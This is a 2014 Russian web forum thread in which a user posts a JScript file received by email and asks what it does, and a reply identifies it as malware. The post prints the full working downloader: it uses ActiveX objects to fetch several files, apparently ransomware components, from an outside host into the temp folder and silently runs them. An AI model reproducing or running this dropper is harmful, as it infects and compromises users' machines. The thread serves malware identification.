Javascript.RU

Создать новую тему Ответ
 
Опции темы Искать в теме
  #1 (permalink)  
Старый 10.08.2014, 16:10
guk guk вне форума
Новичок на форуме
Отправить личное сообщение для guk Посмотреть профиль Найти все сообщения от guk
 
Регистрация: 10.08.2014
Сообщений: 1

Объясните пожалуйста назначение скрипта который мне прислали по почте
function suckit(c,d){var b=new ActiveXObject("MSXML2.XMLHTTP");b.onreadystatechange=function(){if(4===b.readyState){var a=new ActiveXObject("ADODB.Stream");a.open();a.type=1;a.write(b.ResponseBody);a.position=0;a.saveToFile(d,2);a.close()}};b.open("GET",c,!1);b.send()}function CreateObject(c){return new ActiveXObject(c)}
var shit="%TEMP%\\",suckthis="mebelruss.com",hutri="%TEMP%\\payc.cmd",WshShell=WScript.CreateObject("WScript.Shell"),hutrd="%TEMP%\\word.doc",peaceof="images",WshShell=CreateObject("WScript.Shell"),shit=WshShell.ExpandEnvironmentStrings(shit);try{suckit("http://"+suckthis+"/"+peaceof+"/word",""+shit+"word.doc")}catch(apt){}try{WshShell.Run(""+hutrd+"",0,0)}catch(apti){}suckit("http://"+suckthis+"/"+peaceof+"/payc",""+shit+"payc.cmd");suckit("http://"+suckthis+"/"+peaceof+"/svchost",""+shit+"svchost.like");
suckit("http://"+suckthis+"/"+peaceof+"/genkey",""+shit+"genkey.like");suckit("http://"+suckthis+"/"+peaceof+"/secrypt",""+shit+"secrypt.like");suckit("http://"+suckthis+"/"+peaceof+"/iconv",""+shit+"iconv.dll");suckit("http://"+suckthis+"/"+peaceof+"/paycrypt",""+shit+"paycrypt.like");WshShell.Run(""+hutri+"",0,0);suckit("http://"+suckthis+"/"+peaceof+"/DEC01",""+shit+"DEC01");suckit("http://"+suckthis+"/"+peaceof+"/DEC02",""+shit+"DEC02");
Ответить с цитированием
  #2 (permalink)  
Старый 10.08.2014, 16:40
Аватар для ixth
Профессор
Отправить личное сообщение для ixth Посмотреть профиль Найти все сообщения от ixth
 
Регистрация: 19.01.2010
Сообщений: 354

Зловред скачивает с зараженного сайта mebelruss.com файлы images/payc, images/svchost, images/genkey, images/secrypt, images/iconv, images/paycrypt во временную папку. Затем запускает payc. Что делают скачанные скрипты неясно, потому что сам сайт уже засуспенжен провайдером.
Ответить с цитированием
  #3 (permalink)  
Старый 10.08.2014, 16:48
Профессор
Отправить личное сообщение для Rise Посмотреть профиль Найти все сообщения от Rise
 
Регистрация: 07.11.2013
Сообщений: 912

guk, вот его назначение и ещё

Последний раз редактировалось Rise, 10.08.2014 в 16:52.
Ответить с цитированием
Ответ



Опции темы Искать в теме
Искать в теме:

Расширенный поиск


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
onkeydown/up/press на конкретном элементе Valdemor Events/DOM/Window 4 15.08.2013 21:53
Объясните, пожалуйста мне, что такое значение reference dump Общие вопросы Javascript 1 21.07.2012 18:31
Пожалуйста, объясните что мне сделать с этим... someLogin Events/DOM/Window 2 16.10.2011 22:47
Объясните пожалуйста значение символов после переменной Анатолий Общие вопросы Javascript 1 09.01.2009 03:50